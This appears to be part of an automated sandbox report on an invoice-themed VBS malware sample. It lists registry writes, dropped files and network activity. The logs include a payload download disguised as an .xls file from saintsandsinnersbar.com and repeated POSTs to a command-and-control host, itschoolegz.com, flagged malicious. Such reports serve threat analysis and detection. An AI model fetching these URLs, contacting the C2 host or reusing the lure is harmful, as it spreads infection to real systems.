HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
460000007B000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
652
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
ProxyBypass
1
652
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
IntranetName
1
652
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
1
652
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
0
652
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones
SecuritySafe
1
652
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Recovery\Active
{E3C71041-5F5A-11E9-8447-5254004AAD21}
0
652
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
FullScreen
no
652
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery
Active
0
652
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore
Type
3
652
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore
Count
7
652
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore
Time
E307040001000F0008002D003B009903
652
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore
Blocked
7
652
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage
DecayDateQueue
01000000D08C9DDF0115D1118C7A00C04FC297EB010000002A83B6021EF2C7499630A24288AB378900000000020000000000106600000001000020000000F8216F4B6109EFE4EA4505BD1FE60DAE9E3B3E2FA2508B00E8D0B79FE53D62D1000000000E8000000002000020000000D05BAF43C77264A8849FC3949A0D6A6A48D1A6715FF6E3154B60C40EFC7284C83000000014F3E9AC45F2FA58736FF4CE131358964E1B88FF15816955A92DE52716FCDE6FC40F316DD655392AC6455A7C6ABAD8E14000000054AA13433C619B6C18FEC2B752407A17C0E2FFDE4E4A1758C722B95D6742E33F656F64BD1055A3B345EEF78BB22A75CCC353F145A1B1B575C60CD09FE224BFE9
652
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage
LastProcessed
50DB14A767F3D401
652
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MINIE
TabBandWidth
500
1904
IEXPLORE.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\LowCache\Content
CachePrefix
1904
IEXPLORE.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\LowCache\Cookies
CachePrefix
Cookie:
1904
IEXPLORE.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\LowCache\History
CachePrefix
Visited:

Files activity

Executable files
0
Suspicious files
5
Text files
42
Unknown types
0

Dropped files

PID
Process
Filename
Type
652
iexplore.exe
C:\Users\admin\AppData\Local\Temp\~DF0AAE525685986694.TMP
––
MD5:  ––
SHA256:  ––
2752
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\UJFUX3OG\errorPageStrings[1]
text
MD5: 6b26ecfa58e37d4b5ec861fcdd3f04fa
SHA256: 7f7d1069ca8a852c1c8eb36e1d988fe6a9c17ecb8eff1f66fc5ebfeb5418723a
652
iexplore.exe
C:\Users\admin\AppData\Local\Temp\~DF6DA08B23E1D78275.TMP
––
MD5:  ––
SHA256:  ––
652
iexplore.exe
C:\Users\admin\AppData\Local\Microsoft\Internet Explorer\Recovery\Active\{E3C71043-5F5A-11E9-8447-5254004AAD21}.dat
––
MD5:  ––
SHA256:  ––
1904
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\ZOYIQ18X\background_gradient[1]
image
MD5: 20f0110ed5e4e0d5384a496e4880139b
SHA256: 1471693be91e53c2640fe7baeecbc624530b088444222d93f2815dfce1865d5b
1904
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\UJFUX3OG\info_48[1]
image
MD5: 5565250fcc163aa3a79f0b746416ce69
SHA256: 51129c6c98a82ea491f89857c31146ecec14c4af184517450a7a20c699c84859
1904
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\XLWA6BPE\bullet[1]
image
MD5: 26f971d87ca00e23bd2d064524aef838
SHA256: 1d8e5fd3c1fd384c0a7507e7283c7fe8f65015e521b84569132a7eabedc9d41d
1904
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\YQPEPCE1\down[1]
image
MD5: c4f558c4c8b56858f15c09037cd6625a
SHA256: 39e7de847c9f731eaa72338ad9053217b957859de27b50b6474ec42971530781
1904
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\UJFUX3OG\httpErrorPagesScripts[2]
text
MD5: 3f57b781cb3ef114dd0b665151571b7b
SHA256: 46e019fa34465f4ed096a9665d1827b54553931ad82e98be01edb1ddbc94d3ad
1904
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\YQPEPCE1\ErrorPageTemplate[1]
text
MD5: f4fe1cb77e758e1ba56b8a8ec20417c5
SHA256: 8d018639281b33da8eb3ce0b21d11e1d414e59024c3689f92be8904eb5779b5f
1904
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\ZOYIQ18X\errorPageStrings[1]
text
MD5: 6b26ecfa58e37d4b5ec861fcdd3f04fa
SHA256: 7f7d1069ca8a852c1c8eb36e1d988fe6a9c17ecb8eff1f66fc5ebfeb5418723a
1904
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\XLWA6BPE\http_404[1]
html
MD5: f65c729dc2d457b7a1093813f1253192
SHA256: b82bfb6fa37fd5d56ac7c00536f150c0f244c81f1fc2d4fefbbdc5e175c71b4f
2488
iexplore.exe
C:\Users\admin\AppData\Local\Microsoft\Internet Explorer\Recovery\Active\RecoveryStore.{DC34B86F-5F5A-11E9-8447-5254004AAD21}.dat
––
MD5:  ––
SHA256:  ––
2488
iexplore.exe
C:\Users\admin\AppData\Local\Temp\~DF7DD7794B03DA92B7.TMP
––
MD5:  ––
SHA256:  ––
2488
iexplore.exe
C:\Users\admin\AppData\Local\Temp\~DFB054B7E76C349A4D.TMP
––
MD5:  ––
SHA256:  ––
2488
iexplore.exe
C:\Users\admin\AppData\Local\Microsoft\Internet Explorer\Recovery\Active\{DC34B871-5F5A-11E9-8447-5254004AAD21}.dat
––
MD5:  ––
SHA256:  ––
1892
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\UJFUX3OG\background_gradient[1]
image
MD5: 20f0110ed5e4e0d5384a496e4880139b
SHA256: 1471693be91e53c2640fe7baeecbc624530b088444222d93f2815dfce1865d5b
1892
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\ZOYIQ18X\down[1]
image
MD5: c4f558c4c8b56858f15c09037cd6625a
SHA256: 39e7de847c9f731eaa72338ad9053217b957859de27b50b6474ec42971530781
1892
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\UJFUX3OG\httpErrorPagesScripts[1]
text
MD5: 3f57b781cb3ef114dd0b665151571b7b
SHA256: 46e019fa34465f4ed096a9665d1827b54553931ad82e98be01edb1ddbc94d3ad
1892
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\YQPEPCE1\bullet[1]
image
MD5: 26f971d87ca00e23bd2d064524aef838
SHA256: 1d8e5fd3c1fd384c0a7507e7283c7fe8f65015e521b84569132a7eabedc9d41d
1892
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\XLWA6BPE\info_48[1]
image
MD5: 5565250fcc163aa3a79f0b746416ce69
SHA256: 51129c6c98a82ea491f89857c31146ecec14c4af184517450a7a20c699c84859
1892
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\UJFUX3OG\errorPageStrings[2]
text
MD5: 6b26ecfa58e37d4b5ec861fcdd3f04fa
SHA256: 7f7d1069ca8a852c1c8eb36e1d988fe6a9c17ecb8eff1f66fc5ebfeb5418723a
1892
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\ZOYIQ18X\ErrorPageTemplate[1]
text
MD5: f4fe1cb77e758e1ba56b8a8ec20417c5
SHA256: 8d018639281b33da8eb3ce0b21d11e1d414e59024c3689f92be8904eb5779b5f
1892
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\YQPEPCE1\http_404[1]
html
MD5: f65c729dc2d457b7a1093813f1253192
SHA256: b82bfb6fa37fd5d56ac7c00536f150c0f244c81f1fc2d4fefbbdc5e175c71b4f
908
iexplore.exe
C:\Users\admin\AppData\Local\Microsoft\Internet Explorer\Recovery\Active\RecoveryStore.{D4A4C2F7-5F5A-11E9-8447-5254004AAD21}.dat
––
MD5:  ––
SHA256:  ––
908
iexplore.exe
C:\Users\admin\AppData\Local\Temp\~DF36E790F9BF2392E4.TMP
––
MD5:  ––
SHA256:  ––
908
iexplore.exe
C:\Users\admin\AppData\Local\Temp\~DFB7903B0F2A6E40BD.TMP
––
MD5:  ––
SHA256:  ––
908
iexplore.exe
C:\Users\admin\AppData\Local\Microsoft\Internet Explorer\Recovery\Active\{D4A4C2F9-5F5A-11E9-8447-5254004AAD21}.dat
––
MD5:  ––
SHA256:  ––
2752
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\XLWA6BPE\background_gradient[1]
image
MD5: 20f0110ed5e4e0d5384a496e4880139b
SHA256: 1471693be91e53c2640fe7baeecbc624530b088444222d93f2815dfce1865d5b
2752
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\UJFUX3OG\down[1]
image
MD5: c4f558c4c8b56858f15c09037cd6625a
SHA256: 39e7de847c9f731eaa72338ad9053217b957859de27b50b6474ec42971530781
2752
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\ZOYIQ18X\bullet[1]
image
MD5: 26f971d87ca00e23bd2d064524aef838
SHA256: 1d8e5fd3c1fd384c0a7507e7283c7fe8f65015e521b84569132a7eabedc9d41d
2752
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\YQPEPCE1\info_48[1]
image
MD5: 5565250fcc163aa3a79f0b746416ce69
SHA256: 51129c6c98a82ea491f89857c31146ecec14c4af184517450a7a20c699c84859
2752
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\XLWA6BPE\httpErrorPagesScripts[1]
text
MD5: 3f57b781cb3ef114dd0b665151571b7b
SHA256: 46e019fa34465f4ed096a9665d1827b54553931ad82e98be01edb1ddbc94d3ad
652
iexplore.exe
C:\Users\admin\AppData\Local\Microsoft\Internet Explorer\Recovery\Active\RecoveryStore.{E3C71041-5F5A-11E9-8447-5254004AAD21}.dat
––
MD5:  ––
SHA256:  ––
2752
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\ZOYIQ18X\http_404[1]
html
MD5: f65c729dc2d457b7a1093813f1253192
SHA256: b82bfb6fa37fd5d56ac7c00536f150c0f244c81f1fc2d4fefbbdc5e175c71b4f
2752
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\UJFUX3OG\ErrorPageTemplate[2]
text
MD5: f4fe1cb77e758e1ba56b8a8ec20417c5
SHA256: 8d018639281b33da8eb3ce0b21d11e1d414e59024c3689f92be8904eb5779b5f
2728
iexplore.exe
C:\Users\admin\AppData\Local\Temp\~DFA74FA91FA4FFD4E4.TMP
––
MD5:  ––
SHA256:  ––
2728
iexplore.exe
C:\Users\admin\AppData\Local\Microsoft\Internet Explorer\Recovery\Active\RecoveryStore.{CD2CA503-5F5A-11E9-8447-5254004AAD21}.dat
––
MD5:  ––
SHA256:  ––
2728
iexplore.exe
C:\Users\admin\AppData\Local\Microsoft\Internet Explorer\Recovery\Active\{CD2CA505-5F5A-11E9-8447-5254004AAD21}.dat
binary
MD5: 583c5b6e2fdd9996d79419b9a8ecd1eb
SHA256: 461fe27645647d875f86bbd08879dfbd22cdcb8f97870ad25f273fc664440586
2728
iexplore.exe
C:\Users\admin\AppData\Local\Temp\~DF6903DA4F78FDD3B0.TMP
––
MD5:  ––
SHA256:  ––
2800
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\YQPEPCE1\background_gradient[1]
image
MD5: 20f0110ed5e4e0d5384a496e4880139b
SHA256: 1471693be91e53c2640fe7baeecbc624530b088444222d93f2815dfce1865d5b
2800
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\YQPEPCE1\httpErrorPagesScripts[1]
text
MD5: 3f57b781cb3ef114dd0b665151571b7b
SHA256: 46e019fa34465f4ed096a9665d1827b54553931ad82e98be01edb1ddbc94d3ad
2800
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\ZOYIQ18X\info_48[1]
image
MD5: 5565250fcc163aa3a79f0b746416ce69
SHA256: 51129c6c98a82ea491f89857c31146ecec14c4af184517450a7a20c699c84859
2800
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\XLWA6BPE\down[1]
image
MD5: c4f558c4c8b56858f15c09037cd6625a
SHA256: 39e7de847c9f731eaa72338ad9053217b957859de27b50b6474ec42971530781
2800
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\XLWA6BPE\errorPageStrings[1]
text
MD5: 6b26ecfa58e37d4b5ec861fcdd3f04fa
SHA256: 7f7d1069ca8a852c1c8eb36e1d988fe6a9c17ecb8eff1f66fc5ebfeb5418723a
2800
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\UJFUX3OG\bullet[1]
image
MD5: 26f971d87ca00e23bd2d064524aef838
SHA256: 1d8e5fd3c1fd384c0a7507e7283c7fe8f65015e521b84569132a7eabedc9d41d
2800
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\UJFUX3OG\http_404[2]
html
MD5: f65c729dc2d457b7a1093813f1253192
SHA256: b82bfb6fa37fd5d56ac7c00536f150c0f244c81f1fc2d4fefbbdc5e175c71b4f
2800
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\UJFUX3OG\ErrorPageTemplate[1]
text
MD5: f4fe1cb77e758e1ba56b8a8ec20417c5
SHA256: 8d018639281b33da8eb3ce0b21d11e1d414e59024c3689f92be8904eb5779b5f
2136
iexplore.exe
C:\Users\admin\AppData\Local\Microsoft\Internet Explorer\Recovery\Active\RecoveryStore.{B81E0021-5F5A-11E9-8447-5254004AAD21}.dat
––
MD5:  ––
SHA256:  ––
2136
iexplore.exe
C:\Users\admin\AppData\Local\Temp\~DF80DE6EF062B4C06B.TMP
––
MD5:  ––
SHA256:  ––
2136
iexplore.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\D2U1WPAC\iecompatviewlist[1].xml
xml
MD5: f68a128cdafa596c331514ca90b91859
SHA256: fb563f15f30bfb70f2bfa796047d1036454523e454ed792109b84f0de5f68072
2136
iexplore.exe
C:\Users\admin\AppData\Local\Microsoft\Internet Explorer\IECompatData\iecompatdata.xml
xml
MD5: f68a128cdafa596c331514ca90b91859
SHA256: fb563f15f30bfb70f2bfa796047d1036454523e454ed792109b84f0de5f68072
2136
iexplore.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BDW1XBVN\urlblockindex[1].bin
binary
MD5: fa518e3dfae8ca3a0e495460fd60c791
SHA256: 775853600060162c4b4e5f883f9fd5a278e61c471b3ee1826396b6d129499aa7
2136
iexplore.exe
C:\Users\admin\AppData\Local\Microsoft\Internet Explorer\Recovery\Active\{B81E0023-5F5A-11E9-8447-5254004AAD21}.dat
binary
MD5: addab436ac4063bcd88d12a0b8b4d720
SHA256: 419c2e350507688c6e85abd167f2c172653bd93267a42b692d287b0472bf0a1f
2136
iexplore.exe
C:\Users\admin\AppData\Local\Temp\~DF2A434C7F99621D9E.TMP
––
MD5:  ––
SHA256:  ––
2912
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\ZOYIQ18X\background_gradient[1]
image
MD5: 20f0110ed5e4e0d5384a496e4880139b
SHA256: 1471693be91e53c2640fe7baeecbc624530b088444222d93f2815dfce1865d5b
2912
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\YQPEPCE1\down[1]
image
MD5: c4f558c4c8b56858f15c09037cd6625a
SHA256: 39e7de847c9f731eaa72338ad9053217b957859de27b50b6474ec42971530781
2912
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\UJFUX3OG\info_48[1]
image
MD5: 5565250fcc163aa3a79f0b746416ce69
SHA256: 51129c6c98a82ea491f89857c31146ecec14c4af184517450a7a20c699c84859
2912
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\XLWA6BPE\bullet[1]
image
MD5: 26f971d87ca00e23bd2d064524aef838
SHA256: 1d8e5fd3c1fd384c0a7507e7283c7fe8f65015e521b84569132a7eabedc9d41d
2912
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\YQPEPCE1\errorPageStrings[1]
text
MD5: 6b26ecfa58e37d4b5ec861fcdd3f04fa
SHA256: 7f7d1069ca8a852c1c8eb36e1d988fe6a9c17ecb8eff1f66fc5ebfeb5418723a
2912
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\ZOYIQ18X\httpErrorPagesScripts[1]
text
MD5: 3f57b781cb3ef114dd0b665151571b7b
SHA256: 46e019fa34465f4ed096a9665d1827b54553931ad82e98be01edb1ddbc94d3ad
2912
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\XLWA6BPE\ErrorPageTemplate[1]
text
MD5: f4fe1cb77e758e1ba56b8a8ec20417c5
SHA256: 8d018639281b33da8eb3ce0b21d11e1d414e59024c3689f92be8904eb5779b5f
2912
IEXPLORE.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\UJFUX3OG\http_404[1]
html
MD5: f65c729dc2d457b7a1093813f1253192
SHA256: b82bfb6fa37fd5d56ac7c00536f150c0f244c81f1fc2d4fefbbdc5e175c71b4f
2592
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
binary
MD5: b4e3fcbe4c648ca62b42bb2f78b08567
SHA256: e8762ddc8035a4d4803702b3657fc9ad336d06fca461f210a47551d60a68ad1d
2592
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF1b6d5c.TMP
binary
MD5: b4e3fcbe4c648ca62b42bb2f78b08567
SHA256: e8762ddc8035a4d4803702b3657fc9ad336d06fca461f210a47551d60a68ad1d
2592
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7MWNSL020TRSPYEJ33VD.temp
––
MD5:  ––
SHA256:  ––
2856
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa2856.37052\SignIQ Pty Ltd invoice 127.vbs
––
MD5:  ––
SHA256:  ––
Network activity

HTTP(S) requests
13
TCP/UDP connections
12
DNS requests
5
Threats
0

HTTP requests

PID Process Method HTTP Code IP URL CN Type Size Reputation
–– –– HEAD 200 94.23.14.191:443 https://saintsandsinnersbar.com/duplicate/answear.xls FR –– –– unknown
–– –– GET 200 94.23.14.191:443 https://saintsandsinnersbar.com/duplicate/answear.xls FR executable unknown
2912 IEXPLORE.EXE POST 404 46.17.45.108:443 https://itschoolegz.com/index.htm RU text html malicious
1628 dVjiJafHlc.exe POST 404 46.17.45.108:443 https://itschoolegz.com/index.htm RU text html malicious
1628 dVjiJafHlc.exe POST 404 46.17.45.108:443 https://itschoolegz.com/index.htm RU text html malicious
2136 iexplore.exe GET 200 152.199.19.161:443 https://r20swj13mr.microsoft.com/ieblocklist/v1/urlblockindex.bin US binary whitelisted
2136 iexplore.exe GET 200 152.199.19.161:443 https://iecvlist.microsoft.com/IE11/1479242656000/iecompatviewlist.xml US xml whitelisted
2136 iexplore.exe GET 304 152.199.19.161:443 https://iecvlist.microsoft.com/ie11blocklist/1401746408/versionlistWin7.xml US –– –– whitelisted
2136 iexplore.exe GET 200 152.199.19.161:443 https://r20swj13mr.microsoft.com/ieblocklist/v1/urlblocklist.bin US –– –– whitelisted
2800 IEXPLORE.EXE POST 404 46.17.45.108:443 https://itschoolegz.com/index.htm RU text html malicious
2752 IEXPLORE.EXE POST 404 46.17.45.108:443 https://itschoolegz.com/index.htm RU text html malicious
1892 IEXPLORE.EXE POST 404 46.17.45.108:443 https://itschoolegz.com/index.htm RU text html malicious
1904 IEXPLORE.EXE POST 404 46.17.45.108:443 https://itschoolegz.com/index.htm RU text html malicious
Connections

PID Process IP ASN CN Reputation
–– –– 94.23.14.191:443 OVH SAS FR unknown
2912 IEXPLORE.EXE 46.17.45.108:443 LLC Baxet RU malicious
1628 dVjiJafHlc.exe 46.17.45.108:443 LLC Baxet RU malicious
2136 iexplore.exe 152.199.19.161:443 MCI Communications Services, Inc. d/b/a Verizon Business US whitelisted
2800 IEXPLORE.EXE 46.17.45.108:443 LLC Baxet RU malicious
2752 IEXPLORE.EXE 46.17.45.108:443 LLC Baxet RU malicious
1892 IEXPLORE.EXE 46.17.45.108:443 LLC Baxet RU malicious
1904 IEXPLORE.EXE 46.17.45.108:443 LLC Baxet RU malicious

DNS requests

Domain IP Reputation
teredo.ipv6.microsoft.com No response unknown
saintsandsinnersbar.com 94.23.14.191 unknown
itschoolegz.com 46.17.45.108 malicious
r20swj13mr.microsoft.com 152.199.19.161 whitelisted
iecvlist.microsoft.com 152.199.19.161 whitelisted

Threats

No threats detected.

Debug output strings

Process Message
–– base\diagnosis\diagtrack\engine\heartbeat.cpp(199)\diagtrack.dll!000007FEFA4EDA84: (caller: 000007FEFA4ED257) ReturnHr[PreRelease](60) tid(514) 80070510 The requested file operation failed because the storage policy blocks that type of file. For more information, contact your system administrator.
–– base\diagnosis\diagtrack\engine\heartbeat.cpp(199)\diagtrack.dll!000007FEFA4EDA84: (caller: 000007FEFA4ED257) ReturnHr[PreRelease](60) tid(514) 80070510 The requested file operation failed because the storage policy blocks that type of file. For more information, contact your system administrator.